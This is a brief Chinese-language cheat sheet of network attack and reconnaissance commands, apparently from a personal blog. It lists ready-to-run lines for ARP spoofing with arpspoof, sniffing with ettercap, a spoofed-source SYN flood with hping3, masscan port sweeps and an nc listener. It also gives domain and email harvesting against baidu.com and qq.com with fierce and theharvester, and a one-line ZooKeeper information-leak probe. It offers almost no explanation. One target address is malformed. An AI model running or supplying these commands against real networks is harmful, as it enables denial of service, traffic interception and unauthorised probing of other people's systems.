ARP欺骗:arpspoof -i eth0 -t 192.168.185 192.168.1.1
嗅探工具:ettercap -Tq -i eth0
SYN Flood攻击(ddos分布式拒绝服务攻击):hping3 -q -n -a 2.2.2.2 -S -s 53 --keep -p 445 --flood 192.168.1.138
hping3 -q -n -a 伪造源IP -S -s 伪造源端口 --keep -p 目的端口 --flood 目的IP
masscan -p80 192.168.1.112/24 扫描端口工具
监听80端口 nc -lvp 80
域名综合性扫描工具 fierce -dns baidu.com -threads 200
从百度(baidu)搜索引擎中的前200项搜索结果中挖掘目标域里的电子邮件地址和主机名
theharvester -d qq.com -l 200 -b baidu
-l限制并发搜索结果
-b指定搜索引擎(google,pgp,bing,linkedin,baidu等)
-d指定搜索对象
-h使用Shodan数据库去搜索主机
whatweb -i /root/test.txt(必须为域名) --log-xml=baidu.xml
pwd 查看当前目录
echo envi | nc ip 2181 用于利用zookeeper漏洞
masscan -p80 172.30.12.6/24 -oL 80.txt;sed '/^#[\w.]*/d' 80.txt | awk '{print $4":"$3}' > - | whatweb -i -
awk '{print $1}' data2.txt
nikto dirbuster
浙公网安备 33010602011771号